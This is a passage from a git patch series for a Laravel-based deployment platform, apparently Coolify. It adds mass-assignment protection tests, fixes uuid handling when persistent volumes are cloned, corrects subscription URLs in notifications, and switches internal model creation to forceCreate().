+        expect($user->isFillable('two_factor_recovery_codes'))->toBeFalse('two_factor_recovery_codes should not be fillable');
+    });
+
+    test('User model allows mass assignment of profile fields', function () {
+        $user = new User;
+
+        expect($user->isFillable('name'))->toBeTrue();
+        expect($user->isFillable('email'))->toBeTrue();
+        expect($user->isFillable('password'))->toBeTrue();
+    });
+
+    test('Team model blocks mass assignment of internal fields', function () {
+        $team = new Team;
+
+        expect($team->isFillable('id'))->toBeFalse();
+        expect($team->isFillable('personal_team'))->toBeFalse('personal_team should not be fillable');
+    });
+
+    test('Service model blocks mass assignment of identity fields', function () {
+        $service = new Service;
+
+        expect($service->isFillable('id'))->toBeFalse();
+        expect($service->isFillable('uuid'))->toBeFalse();
+    });
+
+    test('Service model allows mass assignment of relationship fields needed for create()', function () {
+        $service = new Service;
+
+        expect($service->isFillable('environment_id'))->toBeTrue();
+        expect($service->isFillable('destination_id'))->toBeTrue();
+        expect($service->isFillable('destination_type'))->toBeTrue();
+        expect($service->isFillable('server_id'))->toBeTrue();
+    });
+
+    test('standalone database models block mass assignment of identity and relationship fields', function () {
+        $models = [
+            StandalonePostgresql::class,
+            StandaloneRedis::class,
+            StandaloneMysql::class,
+            StandaloneMariadb::class,
+            StandaloneMongodb::class,
+            StandaloneKeydb::class,
+            StandaloneDragonfly::class,
+            StandaloneClickhouse::class,
+        ];
+
+        foreach ($models as $modelClass) {
+            $model = new $modelClass;
+
+            expect($model->isFillable('id'))
+                ->toBeFalse("{$modelClass} should not allow mass assignment of 'id'");
+            expect($model->isFillable('uuid'))
+                ->toBeFalse("{$modelClass} should not allow mass assignment of 'uuid'");
+            expect($model->isFillable('environment_id'))
+                ->toBeFalse("{$modelClass} should not allow mass assignment of 'environment_id'");
+            expect($model->isFillable('destination_id'))
+                ->toBeFalse("{$modelClass} should not allow mass assignment of 'destination_id'");
+            expect($model->isFillable('destination_type'))
+                ->toBeFalse("{$modelClass} should not allow mass assignment of 'destination_type'");
+        }
+    });
+
+    test('standalone database models allow mass assignment of config fields', function () {
+        $model = new StandalonePostgresql;
+        expect($model->isFillable('name'))->toBeTrue();
+        expect($model->isFillable('postgres_user'))->toBeTrue();
+        expect($model->isFillable('postgres_password'))->toBeTrue();
+        expect($model->isFillable('image'))->toBeTrue();
+        expect($model->isFillable('limits_memory'))->toBeTrue();
+
+        $model = new StandaloneRedis;
+        expect($model->isFillable('redis_conf'))->toBeTrue();
+
+        $model = new StandaloneMysql;
+        expect($model->isFillable('mysql_root_password'))->toBeTrue();
+
+        $model = new StandaloneMongodb;
+        expect($model->isFillable('mongo_initdb_root_username'))->toBeTrue();
+    });
+
+    test('standalone database models allow mass assignment of public_port_timeout', function () {
+        $models = [
+            StandalonePostgresql::class,
+            StandaloneRedis::class,
+            StandaloneMysql::class,
+            StandaloneMariadb::class,
+            StandaloneMongodb::class,
+            StandaloneKeydb::class,
+            StandaloneDragonfly::class,
+            StandaloneClickhouse::class,
+        ];
+
+        foreach ($models as $modelClass) {
+            $model = new $modelClass;
+            expect($model->isFillable('public_port_timeout'))
+                ->toBeTrue("{$modelClass} should allow mass assignment of 'public_port_timeout'");
+        }
+    });
+
+    test('standalone database models allow mass assignment of SSL fields where applicable', function () {
+        // Models with enable_ssl
+        $sslModels = [
+            StandalonePostgresql::class,
+            StandaloneMysql::class,
+            StandaloneMariadb::class,
+            StandaloneMongodb::class,
+            StandaloneRedis::class,
+            StandaloneKeydb::class,
+            StandaloneDragonfly::class,
+        ];
+
+        foreach ($sslModels as $modelClass) {
+            $model = new $modelClass;
+            expect($model->isFillable('enable_ssl'))
+                ->toBeTrue("{$modelClass} should allow mass assignment of 'enable_ssl'");
+        }
+
+        // Clickhouse has no SSL columns
+        expect((new StandaloneClickhouse)->isFillable('enable_ssl'))->toBeFalse();
+
+        // Models with ssl_mode
+        $sslModeModels = [
+            StandalonePostgresql::class,
+            StandaloneMysql::class,
+            StandaloneMongodb::class,
+        ];
+
+        foreach ($sslModeModels as $modelClass) {
+            $model = new $modelClass;
+            expect($model->isFillable('ssl_mode'))
+                ->toBeTrue("{$modelClass} should allow mass assignment of 'ssl_mode'");
+        }
+    });
+});

From 4ec9b7ef69d16231f80d021e5b712f665e8f60ef Mon Sep 17 00:00:00 2001
From: Andras Bacsai <5845193+andrasbacsai@users.noreply.github.com>
Date: Mon, 30 Mar 2026 00:06:45 +0200
Subject: [PATCH 197/213] fix(clone): include uuid field when cloning
 persistent volumes

Ensure that the uuid field is preserved during clone operations for persistent
volumes across all clone methods (CloneMe, ResourceOperations, and the clone_application
helper). This prevents UUID conflicts and ensures cloned volumes receive new unique
identifiers as intended.

Adds test coverage validating that cloned persistent volumes receive new UUIDs
distinct from the original volumes.
---
 app/Livewire/Project/CloneMe.php              |  3 +
 .../Project/Shared/ResourceOperations.php     |  3 +
 bootstrap/helpers/applications.php            |  1 +
 .../Feature/ClonePersistentVolumeUuidTest.php | 84 +++++++++++++++++++
 4 files changed, 91 insertions(+)
 create mode 100644 tests/Feature/ClonePersistentVolumeUuidTest.php

diff --git a/app/Livewire/Project/CloneMe.php b/app/Livewire/Project/CloneMe.php
index 013e66901..e236124e9 100644
--- a/app/Livewire/Project/CloneMe.php
+++ b/app/Livewire/Project/CloneMe.php
@@ -187,6 +187,7 @@ public function clone(string $type)
                         'id',
                         'created_at',
                         'updated_at',
+                        'uuid',
                     ])->forceFill([
                         'name' => $newName,
                         'resource_id' => $newDatabase->id,
@@ -315,6 +316,7 @@ public function clone(string $type)
                             'id',
                             'created_at',
                             'updated_at',
+                            'uuid',
                         ])->forceFill([
                             'name' => $newName,
                             'resource_id' => $application->id,
@@ -369,6 +371,7 @@ public function clone(string $type)
                             'id',
                             'created_at',
                             'updated_at',
+                            'uuid',
                         ])->forceFill([
                             'name' => $newName,
                             'resource_id' => $database->id,
diff --git a/app/Livewire/Project/Shared/ResourceOperations.php b/app/Livewire/Project/Shared/ResourceOperations.php
index a26b43026..301c51be9 100644
--- a/app/Livewire/Project/Shared/ResourceOperations.php
+++ b/app/Livewire/Project/Shared/ResourceOperations.php
@@ -142,6 +142,7 @@ public function cloneTo($destination_id)
                     'id',
                     'created_at',
                     'updated_at',
+                    'uuid',
                 ])->forceFill([
                     'name' => $newName,
                     'resource_id' => $new_resource->id,
@@ -280,6 +281,7 @@ public function cloneTo($destination_id)
                         'id',
                         'created_at',
                         'updated_at',
+                        'uuid',
                     ])->forceFill([
                         'name' => $newName,
                         'resource_id' => $application->id,
@@ -322,6 +324,7 @@ public function cloneTo($destination_id)
                         'id',
                         'created_at',
                         'updated_at',
+                        'uuid',
                     ])->forceFill([
                         'name' => $newName,
                         'resource_id' => $database->id,
diff --git a/bootstrap/helpers/applications.php b/bootstrap/helpers/applications.php
index fbcedf277..4af6ac90a 100644
--- a/bootstrap/helpers/applications.php
+++ b/bootstrap/helpers/applications.php
@@ -300,6 +300,7 @@ function clone_application(Application $source, $destination, array $overrides =
             'id',
             'created_at',
             'updated_at',
+            'uuid',
         ])->fill([
             'name' => $newName,
             'resource_id' => $newApplication->id,
diff --git a/tests/Feature/ClonePersistentVolumeUuidTest.php b/tests/Feature/ClonePersistentVolumeUuidTest.php
new file mode 100644
index 000000000..f1ae8dd26
--- /dev/null
+++ b/tests/Feature/ClonePersistentVolumeUuidTest.php
@@ -0,0 +1,84 @@
+<?php
+
+use App\Livewire\Project\Shared\ResourceOperations;
+use App\Models\Application;
+use App\Models\Environment;
+use App\Models\LocalPersistentVolume;
+use App\Models\Project;
+use App\Models\Server;
+use App\Models\StandaloneDocker;
+use App\Models\Team;
+use App\Models\User;
+use Livewire\Livewire;
+
+beforeEach(function () {
+    $this->user = User::factory()->create();
+    $this->team = Team::factory()->create();
+    $this->user->teams()->attach($this->team, ['role' => 'owner']);
+
+    $this->server = Server::factory()->create(['team_id' => $this->team->id]);
+    $this->destination = StandaloneDocker::factory()->create(['server_id' => $this->server->id]);
+    $this->project = Project::factory()->create(['team_id' => $this->team->id]);
+    $this->environment = Environment::factory()->create(['project_id' => $this->project->id]);
+
+    $this->application = Application::factory()->create([
+        'environment_id' => $this->environment->id,
+        'destination_id' => $this->destination->id,
+        'destination_type' => $this->destination->getMorphClass(),
+    ]);
+
+    $this->actingAs($this->user);
+    session(['currentTeam' => $this->team]);
+});
+
+test('cloning application generates new uuid for persistent volumes', function () {
+    $volume = LocalPersistentVolume::create([
+        'name' => $this->application->uuid.'-data',
+        'mount_path' => '/data',
+        'resource_id' => $this->application->id,
+        'resource_type' => $this->application->getMorphClass(),
+    ]);
+
+    $originalUuid = $volume->uuid;
+
+    $newApp = clone_application($this->application, $this->destination, [
+        'environment_id' => $this->environment->id,
+    ]);
+
+    $clonedVolume = $newApp->persistentStorages()->first();
+
+    expect($clonedVolume)->not->toBeNull();
+    expect($clonedVolume->uuid)->not->toBe($originalUuid);
+    expect($clonedVolume->mount_path)->toBe('/data');
+});
+
+test('cloning application with multiple persistent volumes generates unique uuids', function () {
+    $volume1 = LocalPersistentVolume::create([
+        'name' => $this->application->uuid.'-data',
+        'mount_path' => '/data',
+        'resource_id' => $this->application->id,
+        'resource_type' => $this->application->getMorphClass(),
+    ]);
+
+    $volume2 = LocalPersistentVolume::create([
+        'name' => $this->application->uuid.'-config',
+        'mount_path' => '/config',
+        'resource_id' => $this->application->id,
+        'resource_type' => $this->application->getMorphClass(),
+    ]);
+
+    $newApp = clone_application($this->application, $this->destination, [
+        'environment_id' => $this->environment->id,
+    ]);
+
+    $clonedVolumes = $newApp->persistentStorages()->get();
+
+    expect($clonedVolumes)->toHaveCount(2);
+
+    $clonedUuids = $clonedVolumes->pluck('uuid')->toArray();
+    $originalUuids = [$volume1->uuid, $volume2->uuid];
+
+    // All cloned UUIDs should be unique and different from originals
+    expect($clonedUuids)->each->not->toBeIn($originalUuids);
+    expect(array_unique($clonedUuids))->toHaveCount(2);
+});

From 31ae8dd9db14d7133f1498535d7d65d3847c0fe4 Mon Sep 17 00:00:00 2001
From: ShadowArcanist <162910371+ShadowArcanist@users.noreply.github.com>
Date: Mon, 30 Mar 2026 11:37:28 +0530
Subject: [PATCH 198/213] fix(notification): updated cloud subscription links
 to valid url

---
 app/Notifications/Server/ForceDisabled.php             | 8 ++++----
 resources/views/emails/server-force-disabled.blade.php | 2 +-
 2 files changed, 5 insertions(+), 5 deletions(-)

diff --git a/app/Notifications/Server/ForceDisabled.php b/app/Notifications/Server/ForceDisabled.php
index 7a1f7bcbf..4b56f5860 100644
--- a/app/Notifications/Server/ForceDisabled.php
+++ b/app/Notifications/Server/ForceDisabled.php
@@ -40,7 +40,7 @@ public function toDiscord(): DiscordMessage
             color: DiscordMessage::errorColor(),
         );
 
-        $message->addField('Please update your subscription to enable the server again!', '[Link](https://app.coolify.io/subscriptions)');
+        $message->addField('Please update your subscription to enable the server again!', '[Link](https://app.coolify.io/subscription)');
 
         return $message;
     }
@@ -48,7 +48,7 @@ public function toDiscord(): DiscordMessage
     public function toTelegram(): array
     {
         return [
-            'message' => "Coolify: Server ({$this->server->name}) disabled because it is not paid!\n All automations and integrations are stopped.\nPlease update your subscription to enable the server again [here](https://app.coolify.io/subscriptions).",
+            'message' => "Coolify: Server ({$this->server->name}) disabled because it is not paid!\n All automations and integrations are stopped.\nPlease update your subscription to enable the server again [here](https://app.coolify.io/subscription).",
         ];
     }
 
@@ -57,7 +57,7 @@ public function toPushover(): PushoverMessage
         return new PushoverMessage(
             title: 'Server disabled',
             level: 'error',
-            message: "Server ({$this->server->name}) disabled because it is not paid!\n All automations and integrations are stopped.<br/>Please update your subscription to enable the server again [here](https://app.coolify.io/subscriptions).",
+            message: "Server ({$this->server->name}) disabled because it is not paid!\n All automations and integrations are stopped.<br/>Please update your subscription to enable the server again [here](https://app.coolify.io/subscription).",
         );
     }
 
@@ -66,7 +66,7 @@ public function toSlack(): SlackMessage
         $title = 'Server disabled';
         $description = "Server ({$this->server->name}) disabled because it is not paid!\n";
         $description .= "All automations and integrations are stopped.\n\n";
-        $description .= 'Please update your subscription to enable the server again: https://app.coolify.io/subscriptions';
+        $description .= 'Please update your subscription to enable the server again: https://app.coolify.io/subscription';
 
         return new SlackMessage(
             title: $title,
diff --git a/resources/views/emails/server-force-disabled.blade.php b/resources/views/emails/server-force-disabled.blade.php
index 805df3296..4ab46b5a0 100644
--- a/resources/views/emails/server-force-disabled.blade.php
+++ b/resources/views/emails/server-force-disabled.blade.php
@@ -1,5 +1,5 @@
 <x-emails.layout>
     Your server ({{ $name }}) disabled because it is not paid! All automations and integrations are stopped.
 
-    Please update your subscription to enable the server again [here](https://app.coolify.io/subscriptions).
+    Please update your subscription to enable the server again [here](https://app.coolify.io/subscription).
 </x-emails.layout>

From c0c0349880395e8780da53d8b90a353bc153653b Mon Sep 17 00:00:00 2001
From: Andras Bacsai <5845193+andrasbacsai@users.noreply.github.com>
Date: Mon, 30 Mar 2026 08:11:23 +0200
Subject: [PATCH 199/213] refactor(models): add fillable attributes for
 database configuration options

Add explicit fillable attributes to Service and all Standalone* database models
for new configuration options: public_port_timeout, enable_ssl, ssl_mode,
is_log_drain_enabled, is_include_timestamps, and custom_docker_run_options.

Add tests to MassAssignmentProtectionTest to verify these attributes are
properly protected by mass assignment protection across all relevant models.
---
 app/Models/Service.php                        |  1 +
 app/Models/StandaloneClickhouse.php           |  3 ++
 app/Models/StandaloneDragonfly.php            |  3 ++
 app/Models/StandaloneKeydb.php                |  3 ++
 app/Models/StandaloneMariadb.php              |  4 ++
 app/Models/StandaloneMongodb.php              |  6 +++
 app/Models/StandaloneMysql.php                |  6 +++
 app/Models/StandalonePostgresql.php           |  6 +++
 app/Models/StandaloneRedis.php                |  5 ++
 .../Feature/MassAssignmentProtectionTest.php  | 52 +++++++++++++++++++
 10 files changed, 89 insertions(+)

diff --git a/app/Models/Service.php b/app/Models/Service.php
index b3ff85e53..491924c49 100644
--- a/app/Models/Service.php
+++ b/app/Models/Service.php
@@ -57,6 +57,7 @@ class Service extends BaseModel
         'service_type',
         'config_hash',
         'compose_parsing_version',
+        'is_container_label_escape_enabled',
     ];
 
     protected $appends = ['server_status', 'status'];
diff --git a/app/Models/StandaloneClickhouse.php b/app/Models/StandaloneClickhouse.php
index c192e5360..c6d91dd55 100644
--- a/app/Models/StandaloneClickhouse.php
+++ b/app/Models/StandaloneClickhouse.php
@@ -37,6 +37,9 @@ class StandaloneClickhouse extends BaseModel
         'last_restart_at',
         'last_restart_type',
         'last_online_at',
+        'public_port_timeout',
+        'custom_docker_run_options',
+        'clickhouse_db',
     ];
 
     protected $appends = ['internal_db_url', 'external_db_url', 'database_type', 'server_status'];
diff --git a/app/Models/StandaloneDragonfly.php b/app/Models/StandaloneDragonfly.php
index 7cc74f0ce..af309f980 100644
--- a/app/Models/StandaloneDragonfly.php
+++ b/app/Models/StandaloneDragonfly.php
@@ -36,6 +36,9 @@ class StandaloneDragonfly extends BaseModel
         'last_restart_at',
         'last_restart_type',
         'last_online_at',
+        'public_port_timeout',
+        'enable_ssl',
+        'custom_docker_run_options',
     ];
 
     protected $appends = ['internal_db_url', 'external_db_url', 'database_type', 'server_status'];
diff --git a/app/Models/StandaloneKeydb.php b/app/Models/StandaloneKeydb.php
index 7a0d7f03d..ee07b4783 100644
--- a/app/Models/StandaloneKeydb.php
+++ b/app/Models/StandaloneKeydb.php
@@ -37,6 +37,9 @@ class StandaloneKeydb extends BaseModel
         'last_restart_at',
         'last_restart_type',
         'last_online_at',
+        'public_port_timeout',
+        'enable_ssl',
+        'custom_docker_run_options',
     ];
 
     protected $appends = ['internal_db_url', 'external_db_url', 'server_status'];
diff --git a/app/Models/StandaloneMariadb.php b/app/Models/StandaloneMariadb.php
index 6cac9e5f4..ad5220496 100644
--- a/app/Models/StandaloneMariadb.php
+++ b/app/Models/StandaloneMariadb.php
@@ -39,6 +39,10 @@ class StandaloneMariadb extends BaseModel
         'last_restart_at',
         'last_restart_type',
         'last_online_at',
+        'public_port_timeout',
+        'enable_ssl',
+        'is_log_drain_enabled',
+        'custom_docker_run_options',
     ];
 
     protected $appends = ['internal_db_url', 'external_db_url', 'database_type', 'server_status'];
diff --git a/app/Models/StandaloneMongodb.php b/app/Models/StandaloneMongodb.php
index 5ca4ef5d3..590c173e1 100644
--- a/app/Models/StandaloneMongodb.php
+++ b/app/Models/StandaloneMongodb.php
@@ -37,6 +37,12 @@ class StandaloneMongodb extends BaseModel
         'last_restart_at',
         'last_restart_type',
         'last_online_at',
+        'public_port_timeout',
+        'enable_ssl',
+        'ssl_mode',
+        'is_log_drain_enabled',
+        'is_include_timestamps',
+        'custom_docker_run_options',
     ];
 
     protected $appends = ['internal_db_url', 'external_db_url', 'database_type', 'server_status'];
diff --git a/app/Models/StandaloneMysql.php b/app/Models/StandaloneMysql.php
index cf8d78a9c..d991617b7 100644
--- a/app/Models/StandaloneMysql.php
+++ b/app/Models/StandaloneMysql.php
@@ -38,6 +38,12 @@ class StandaloneMysql extends BaseModel
         'last_restart_at',
         'last_restart_type',
         'last_online_at',
+        'public_port_timeout',
+        'enable_ssl',
+        'ssl_mode',
+        'is_log_drain_enabled',
+        'is_include_timestamps',
+        'custom_docker_run_options',
     ];
 
     protected $appends = ['internal_db_url', 'external_db_url', 'database_type', 'server_status'];
diff --git a/app/Models/StandalonePostgresql.php b/app/Models/StandalonePostgresql.php
index 7db334c5d..71034427f 100644
--- a/app/Models/StandalonePostgresql.php
+++ b/app/Models/StandalonePostgresql.php
@@ -40,6 +40,12 @@ class StandalonePostgresql extends BaseModel
         'last_restart_at',
         'last_restart_type',
         'last_online_at',
+        'public_port_timeout',
+        'enable_ssl',
+        'ssl_mode',
+        'is_log_drain_enabled',
+        'is_include_timestamps',
+        'custom_docker_run_options',
     ];
 
     protected $appends = ['internal_db_url', 'external_db_url', 'database_type', 'server_status'];
diff --git a/app/Models/StandaloneRedis.php b/app/Models/StandaloneRedis.php
index 2320619cf..4eb28e038 100644
--- a/app/Models/StandaloneRedis.php
+++ b/app/Models/StandaloneRedis.php
@@ -34,6 +34,11 @@ class StandaloneRedis extends BaseModel
         'last_restart_at',
         'last_restart_type',
         'last_online_at',
+        'public_port_timeout',
+        'enable_ssl',
+        'is_log_drain_enabled',
+        'is_include_timestamps',
+        'custom_docker_run_options',
     ];
 
     protected $appends = ['internal_db_url', 'external_db_url', 'database_type', 'server_status'];
diff --git a/tests/Feature/MassAssignmentProtectionTest.php b/tests/Feature/MassAssignmentProtectionTest.php
index 18de67ce7..436d0736b 100644
--- a/tests/Feature/MassAssignmentProtectionTest.php
+++ b/tests/Feature/MassAssignmentProtectionTest.php
@@ -168,6 +168,58 @@
         expect($model->isFillable('mongo_initdb_root_username'))->toBeTrue();
     });
 
+    test('standalone database models allow mass assignment of public_port_timeout', function () {
+        $models = [
+            StandalonePostgresql::class,
+            StandaloneRedis::class,
+            StandaloneMysql::class,
+            StandaloneMariadb::class,
+            StandaloneMongodb::class,
+            StandaloneKeydb::class,
+            StandaloneDragonfly::class,
+            StandaloneClickhouse::class,
+        ];
+
+        foreach ($models as $modelClass) {
+            $model = new $modelClass;
+            expect($model->isFillable('public_port_timeout'))
+                ->toBeTrue("{$modelClass} should allow mass assignment of 'public_port_timeout'");
+        }
+    });
+
+    test('standalone database models allow mass assignment of SSL fields where applicable', function () {
+        $sslModels = [
+            StandalonePostgresql::class,
+            StandaloneMysql::class,
+            StandaloneMariadb::class,
+            StandaloneMongodb::class,
+            StandaloneRedis::class,
+            StandaloneKeydb::class,
+            StandaloneDragonfly::class,
+        ];
+
+        foreach ($sslModels as $modelClass) {
+            $model = new $modelClass;
+            expect($model->isFillable('enable_ssl'))
+                ->toBeTrue("{$modelClass} should allow mass assignment of 'enable_ssl'");
+        }
+
+        // Clickhouse has no SSL columns
+        expect((new StandaloneClickhouse)->isFillable('enable_ssl'))->toBeFalse();
+
+        $sslModeModels = [
+            StandalonePostgresql::class,
+            StandaloneMysql::class,
+            StandaloneMongodb::class,
+        ];
+
+        foreach ($sslModeModels as $modelClass) {
+            $model = new $modelClass;
+            expect($model->isFillable('ssl_mode'))
+                ->toBeTrue("{$modelClass} should allow mass assignment of 'ssl_mode'");
+        }
+    });
+
     test('Application fill ignores non-fillable fields', function () {
         $application = new Application;
         $application->fill([

From 1da1f32f0e38b051480c13a265e6ce0a3dc35822 Mon Sep 17 00:00:00 2001
From: Andras Bacsai <5845193+andrasbacsai@users.noreply.github.com>
Date: Mon, 30 Mar 2026 13:04:11 +0200
Subject: [PATCH 200/213] refactor: use forceCreate() for internal model
 creation

Replace create() with forceCreate() across internal model creation operations to bypass mass assignment protection. This is appropriate for internal code that constructs complete model state without user input.

Add InternalModelCreationMassAssignmentTest to ensure internal model creation behavior is properly tested. Optimize imports by using shortened Livewire attribute references and removing unused imports.
---
 app/Actions/Server/InstallDocker.php          |  2 +-
 app/Console/Commands/Emails.php               |  2 +-
 .../Controllers/Api/ProjectController.php     |  9 +-
 .../Controllers/Api/ServicesController.php    |  2 +-
 app/Http/Controllers/Webhook/Bitbucket.php    |  4 +-
 app/Http/Controllers/Webhook/Gitea.php        |  4 +-
 app/Http/Controllers/Webhook/Gitlab.php       |  4 +-
 app/Jobs/ProcessGithubPullRequestWebhook.php  |  4 +-
 app/Livewire/Boarding/Index.php               | 15 ++--
 app/Livewire/Destination/New/Docker.php       |  5 +-
 app/Livewire/Project/AddEmpty.php             |  2 +-
 app/Livewire/Project/Application/Previews.php |  6 +-
 app/Livewire/Project/CloneMe.php              |  2 +-
 app/Livewire/Project/New/DockerCompose.php    |  2 +-
 app/Livewire/Project/New/DockerImage.php      |  2 +-
 app/Livewire/Project/New/EmptyProject.php     |  2 +-
 .../Project/New/GithubPrivateRepository.php   |  5 +-
 .../New/GithubPrivateRepositoryDeployKey.php  |  5 +-
 .../Project/New/PublicGitRepository.php       |  9 +-
 app/Livewire/Project/New/SimpleDockerfile.php |  2 +-
 app/Livewire/Project/Resource/Create.php      |  2 +-
 app/Livewire/Project/Show.php                 |  2 +-
 app/Livewire/Server/Destinations.php          |  4 +-
 app/Livewire/SettingsBackup.php               |  7 +-
 app/Models/Application.php                    |  2 +-
 app/Models/Project.php                        |  4 +-
 app/Models/Server.php                         | 11 +--
 bootstrap/helpers/parsers.php                 | 87 ++++++++++---------
 openapi.json                                  |  3 +-
 openapi.yaml                                  |  3 +-
 templates/service-templates-latest.json       | 24 ++++-
 templates/service-templates.json              | 20 ++++-
 .../Feature/ApplicationHealthCheckApiTest.php |  6 +-
 tests/Feature/ComposePreviewFqdnTest.php      |  9 +-
 .../DatabaseEnvironmentVariableApiTest.php    |  2 +-
 .../DatabasePublicPortTimeoutApiTest.php      |  8 +-
 ...nternalModelCreationMassAssignmentTest.php | 73 ++++++++++++++++
 tests/Feature/ServiceDatabaseTeamTest.php     | 33 +++----
 tests/Feature/StorageApiTest.php              |  2 +-
 tests/Unit/ServiceParserImageUpdateTest.php   | 14 +--
 tests/v4/Browser/DashboardTest.php            |  6 +-
 41 files changed, 265 insertions(+), 145 deletions(-)
 create mode 100644 tests/Feature/InternalModelCreationMassAssignmentTest.php

diff --git a/app/Actions/Server/InstallDocker.php b/app/Actions/Server/InstallDocker.php
index 2e08ec6ad..8bb85c7fc 100644
--- a/app/Actions/Server/InstallDocker.php
+++ b/app/Actions/Server/InstallDocker.php
@@ -49,7 +49,7 @@ public function handle(Server $server)
           }');
         $found = StandaloneDocker::where('server_id', $server->id);
         if ($found->count() == 0 && $server->id) {
-            StandaloneDocker::create([
+            StandaloneDocker::forceCreate([
                 'name' => 'coolify',
                 'network' => 'coolify',
                 'server_id' => $server->id,
diff --git a/app/Console/Commands/Emails.php b/app/Console/Commands/Emails.php
index 43ba06804..462155142 100644
--- a/app/Console/Commands/Emails.php
+++ b/app/Console/Commands/Emails.php
@@ -136,7 +136,7 @@ public function handle()
                 $application = Application::all()->first();
                 $preview = ApplicationPreview::all()->first();
                 if (! $preview) {
-                    $preview = ApplicationPreview::create([
+                    $preview = ApplicationPreview::forceCreate([
                         'application_id' => $application->id,
                         'pull_request_id' => 1,
                         'pull_request_html_url' => 'http://example.com',
diff --git a/app/Http/Controllers/Api/ProjectController.php b/app/Http/Controllers/Api/ProjectController.php
index da553a68c..c8638be0d 100644
--- a/app/Http/Controllers/Api/ProjectController.php
+++ b/app/Http/Controllers/Api/ProjectController.php
@@ -5,6 +5,7 @@
 use App\Http\Controllers\Controller;
 use App\Models\Project;
 use App\Support\ValidationPatterns;
+use Illuminate\Http\JsonResponse;
 use Illuminate\Http\Request;
 use Illuminate\Support\Facades\Validator;
 use OpenApi\Attributes as OA;
@@ -234,7 +235,7 @@ public function create_project(Request $request)
         }
 
         $return = validateIncomingRequest($request);
-        if ($return instanceof \Illuminate\Http\JsonResponse) {
+        if ($return instanceof JsonResponse) {
             return $return;
         }
         $validator = Validator::make($request->all(), [
@@ -257,7 +258,7 @@ public function create_project(Request $request)
             ], 422);
         }
 
-        $project = Project::create([
+        $project = Project::forceCreate([
             'name' => $request->name,
             'description' => $request->description,
             'team_id' => $teamId,
@@ -347,7 +348,7 @@ public function update_project(Request $request)
         }
 
         $return = validateIncomingRequest($request);
-        if ($return instanceof \Illuminate\Http\JsonResponse) {
+        if ($return instanceof JsonResponse) {
             return $return;
         }
         $validator = Validator::make($request->all(), [
@@ -600,7 +601,7 @@ public function create_environment(Request $request)
         }
 
         $return = validateIncomingRequest($request);
-        if ($return instanceof \Illuminate\Http\JsonResponse) {
+        if ($return instanceof JsonResponse) {
             return $return;
         }
         $validator = Validator::make($request->all(), [
diff --git a/app/Http/Controllers/Api/ServicesController.php b/app/Http/Controllers/Api/ServicesController.php
index fbf4b9e56..6a742fe1b 100644
--- a/app/Http/Controllers/Api/ServicesController.php
+++ b/app/Http/Controllers/Api/ServicesController.php
@@ -432,7 +432,7 @@ public function create_service(Request $request)
                 if (in_array($oneClickServiceName, NEEDS_TO_CONNECT_TO_PREDEFINED_NETWORK)) {
                     data_set($servicePayload, 'connect_to_docker_network', true);
                 }
-                $service = Service::create($servicePayload);
+                $service = Service::forceCreate($servicePayload);
                 $service->name = $request->name ?? "$oneClickServiceName-".$service->uuid;
                 $service->description = $request->description;
                 if ($request->has('is_container_label_escape_enabled')) {
diff --git a/app/Http/Controllers/Webhook/Bitbucket.php b/app/Http/Controllers/Webhook/Bitbucket.php
index 183186711..e59bc6ead 100644
--- a/app/Http/Controllers/Webhook/Bitbucket.php
+++ b/app/Http/Controllers/Webhook/Bitbucket.php
@@ -119,7 +119,7 @@ public function manual(Request $request)
                         $found = ApplicationPreview::where('application_id', $application->id)->where('pull_request_id', $pull_request_id)->first();
                         if (! $found) {
                             if ($application->build_pack === 'dockercompose') {
-                                $pr_app = ApplicationPreview::create([
+                                $pr_app = ApplicationPreview::forceCreate([
                                     'git_type' => 'bitbucket',
                                     'application_id' => $application->id,
                                     'pull_request_id' => $pull_request_id,
@@ -128,7 +128,7 @@ public function manual(Request $request)
                                 ]);
                                 $pr_app->generate_preview_fqdn_compose();
                             } else {
-                                $pr_app = ApplicationPreview::create([
+                                $pr_app = ApplicationPreview::forceCreate([
                                     'git_type' => 'bitbucket',
                                     'application_id' => $application->id,
                                     'pull_request_id' => $pull_request_id,
diff --git a/app/Http/Controllers/Webhook/Gitea.php b/app/Http/Controllers/Webhook/Gitea.php
index a9d65eae6..6ba4b33cf 100644
--- a/app/Http/Controllers/Webhook/Gitea.php
+++ b/app/Http/Controllers/Webhook/Gitea.php
@@ -144,7 +144,7 @@ public function manual(Request $request)
                             $found = ApplicationPreview::where('application_id', $application->id)->where('pull_request_id', $pull_request_id)->first();
                             if (! $found) {
                                 if ($application->build_pack === 'dockercompose') {
-                                    $pr_app = ApplicationPreview::create([
+                                    $pr_app = ApplicationPreview::forceCreate([
                                         'git_type' => 'gitea',
                                         'application_id' => $application->id,
                                         'pull_request_id' => $pull_request_id,
@@ -153,7 +153,7 @@ public function manual(Request $request)
                                     ]);
                                     $pr_app->generate_preview_fqdn_compose();
                                 } else {
-                                    $pr_app = ApplicationPreview::create([
+                                    $pr_app = ApplicationPreview::forceCreate([
                                         'git_type' => 'gitea',
                                         'application_id' => $application->id,
                                         'pull_request_id' => $pull_request_id,
diff --git a/app/Http/Controllers/Webhook/Gitlab.php b/app/Http/Controllers/Webhook/Gitlab.php
index 08e5d7162..fe4f17d9e 100644
--- a/app/Http/Controllers/Webhook/Gitlab.php
+++ b/app/Http/Controllers/Webhook/Gitlab.php
@@ -177,7 +177,7 @@ public function manual(Request $request)
                             $found = ApplicationPreview::where('application_id', $application->id)->where('pull_request_id', $pull_request_id)->first();
                             if (! $found) {
                                 if ($application->build_pack === 'dockercompose') {
-                                    $pr_app = ApplicationPreview::create([
+                                    $pr_app = ApplicationPreview::forceCreate([
                                         'git_type' => 'gitlab',
                                         'application_id' => $application->id,
                                         'pull_request_id' => $pull_request_id,
@@ -186,7 +186,7 @@ public function manual(Request $request)
                                     ]);
                                     $pr_app->generate_preview_fqdn_compose();
                                 } else {
-                                    $pr_app = ApplicationPreview::create([
+                                    $pr_app = ApplicationPreview::forceCreate([
                                         'git_type' => 'gitlab',
                                         'application_id' => $application->id,
                                         'pull_request_id' => $pull_request_id,
diff --git a/app/Jobs/ProcessGithubPullRequestWebhook.php b/app/Jobs/ProcessGithubPullRequestWebhook.php
index 041cd812c..01a512439 100644
--- a/app/Jobs/ProcessGithubPullRequestWebhook.php
+++ b/app/Jobs/ProcessGithubPullRequestWebhook.php
@@ -118,7 +118,7 @@ private function handleOpenAction(Application $application, ?GithubApp $githubAp
 
         if (! $found) {
             if ($application->build_pack === 'dockercompose') {
-                $preview = ApplicationPreview::create([
+                $preview = ApplicationPreview::forceCreate([
                     'git_type' => 'github',
                     'application_id' => $application->id,
